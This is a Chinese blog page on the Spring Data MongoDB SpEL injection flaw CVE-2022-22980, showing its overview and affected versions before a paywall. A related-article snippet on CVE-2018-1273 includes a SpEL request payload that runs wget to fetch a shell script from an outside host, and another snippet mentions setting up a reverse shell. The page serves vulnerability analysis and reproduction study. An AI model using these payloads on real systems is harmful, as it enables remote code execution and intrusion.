Spring Data MongoDB SpEL表达式注入漏洞(CVE-2022-22980)分析与利用

最新推荐文章于 2025-03-24 22:06:13 发布
最新推荐文章于 2025-03-24 22:06:13 发布
阅读量2.2k 收藏
点赞数
分类专栏: 【二】攻击技术剖析·漏洞原理·红队 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37865996/article/details/125441326
版权
本文介绍了Spring Data MongoDB中的SpEL表达式注入漏洞(CVE-2022-22980),该漏洞可能导致应用程序遭受攻击。文章详细阐述了漏洞概述、影响版本、漏洞分析,并提供了修复建议和Poc链接。建议受影响用户升级到安全版本或采取缓解措施来防止攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、漏洞概述

        Spring Data for MongoDB是 Spring Data 项目的一部分,该项目旨在为新的数据存储提供熟悉和一致的基于Spring的编程模型,同时保留存储的特定特征和功能。

        6月20日,VMware发布安全公告,修复了Spring Data MongoDB中的一个SpEL 表达式注入漏洞(CVE-2022-22980),该漏洞的CVSSv3评分为8.2。

        Spring Data MongoDB应用程序在对包含查询参数占位符的SpEL表达式使用@Query或@Aggregation注解的查询方法进行值绑定时,如果输入未被过滤,则容易受到SpEL注入攻击。

二、影响版本

Spring Data MongoDB 3.4.0

Spring Data MongoDB 3.3.0 - 3.3.4

了解本专栏 订阅专栏 解锁全文 超级会员免费看
CVE-2022-22980 SpringData MongoDB SpEL表达式注入
qq_32445755的博客
11-13 986
SpringData是为了提供一个常见的、一致的数据访问模型,也就是说,它的目标就是为了能为所有数据库(包括关系型和非关系型)提供一致的数据操作接口,并且这些接口名非常通俗易懂,让人一看便知。它也是基于Spring框架的,即可以直接使用Spring的IoC和AOP等特性。
Spring Data MongoDB 爆出 SpEL 表达式注入漏洞
murphysec的博客
06-23 1963
2022年6月20日,墨菲安全实验室监测到 Spring Data MongoDB 存在 SpEL 表达式注入漏洞Spring Data MongoDB 是基于 Spring 编程模型为 MongoDB 提供接口抽象和通用性模型。 应用程序在使用带有 SpEL 表达式的 @Query 或 @Aggregation-annotated 查询方法时,如果没有对用户输入进行过滤处理,可能会导致 SpEL 表达式注入漏洞漏洞评级:高危影响组件:org.springframework.data:spring-da
『Java CVECVE-2022-22980: Spring Data MongoDB SpEL 注入
Ho1aAs‘s Blog
08-09 1364
# 影响版本 Spring Data MongoDB: 3.3.0-3.3.4、3.4.0 # 漏洞原理 使用@Query或@Aggregation注解进行查询时,通过占位符获取输入参数可能会触发SpEL表达式解析
Apache Subversion Use-After-Free漏洞CVE-2022-24070)
murphysec的博客
04-19 685
CVE-2022-24070漏洞会造成Apache Subversion下处理请求的 HTTPD 工作进程崩溃,进而导致拒绝服务,目前该漏洞已修复,建议受影响用户更新到安全版本,或下载官方补丁:https://subversion.apache.org/security/CVE-2022-24070-advisory.txt 编号       CVE-2022-24070                      标题 Apache Subversion Use-After-Free漏洞
常见框架漏洞之三:Spring
最新发布
gysadsadsa的博客
03-24 627
Spring是Java EE编程领域的⼀个轻量级开源框架,该框架由⼀个叫Rod Johnson的程序员 在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各 层的松耦合问题,因此它将⾯向接⼝的编程思想贯穿整个系统应⽤,实现敏捷开发的应⽤型框 架。框架的主要优势之⼀就是其分层架构,分层架构允许使⽤者选择使⽤哪⼀个组件,同时为 J2EE应⽤程序开发提供集成的框架。
开源漏洞深度分析 | CVE-2022-22980 SpringData MongoDB SpEL表达式注入漏洞
LJQClqjc的博客
06-30 1668
开源漏洞深度分析 | CVE-2022-22980 SpringData MongoDB SpEL表达式注入漏洞
关于Spring Data MongoDB SpEL表达式注入漏洞CVE-2022-22980)的预警提示
Gblfy_Blog
11-05 875
注入漏洞
Spring Data MongoDB SpEL表达式注入漏洞CVE-2022-22890)
Blue的博客
06-27 8170
Spring Data MongoDB 应用程序在使用带有 SpEL 表达式的 @Query 或 @Aggregation-annotated 查询方法时容易受到 SpEL 注入的影响,如果输入未经过过滤,则该表达式包含用于值绑定的查询参数占位符。v3.4.0v3.3.0 to v3.3.41.环境搭建启动环境可以看到如下界面2、环境中默认是没有crul工具,通过命令下载一个curl工具这里尝试DNslog可以看到成功回显在自己服务器上写一个反弹shell脚本,并开启服务 下载文件到tmp目录下服务开启监
漏洞预警|Spring Data MongoDB SpEL表达式注入漏洞
LJQClqjc的博客
06-30 598
近日网上有关于开源项目Spring Data MongoDB 存在SpEL表达式注入的信息,棱镜七彩安全研究院对漏洞进行了POC验证。
SpEL表达式注入漏洞分析、检查防御
hwxiaozhi的博客
03-15 622
程序中如果使用未经校验的输入构造SpEL语句,就有可能造成SpEL表达式注入漏洞,对下游服务可能产生恶意攻击。本文介绍了SpEL表达式以及常见的SpEL注入攻击,详细地介绍了部分漏洞攻击实例以及常用的漏洞检测防御手段。
Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273)
wutiangui的博客
09-10 1068
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
CVE-2022-22980 exp && 靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1083
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)
永远是少年
07-15 711
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库)。 一、题目简介 二、漏洞利用
MongoDB数据库注入-墨者学院(SQL手工注入漏洞测试(MongoDB数据库))
你们de4月天的博客
09-05 1563
MongoDB数据库注入-墨者学院-SQL手工注入漏洞测试(MongoDB数据库)详细讲解
Spring Data MongoDB SpEL表达式注入漏洞安全风险通告第二次更新
smellycat000的专栏
06-23 658
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。安全通告近日,奇安信CERT监测到Spring Data MongoDB SpEL表达式注入漏洞(CVE-2022-22980),当使用@Query或@Aggregation注解进行查询时,若通过SpEL表达式中形如“?0”的占位符来进行参数赋值,同时应用程序未对用户输入进行过滤处理,则可能受到SpE...
【CTF】【cve_2022_22890】Spring Data MongoDB SpEL表达式注入漏洞
菜菜的成长
02-08 859
cve_2022_22890漏洞应用 学习下反弹shell
SQL手工注入漏洞测试(MongoDB数据库)——墨者学院
A2893992091的博客
08-20 405
表有:Authority_confidential、notice、system.indexes。
spring data 集成mongodb
Ackerly Xu的博客
09-29 215
maven依赖 <dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-mongodb</artifactId> <version>1.10.7.R...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

东方隐侠安全团队-千里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值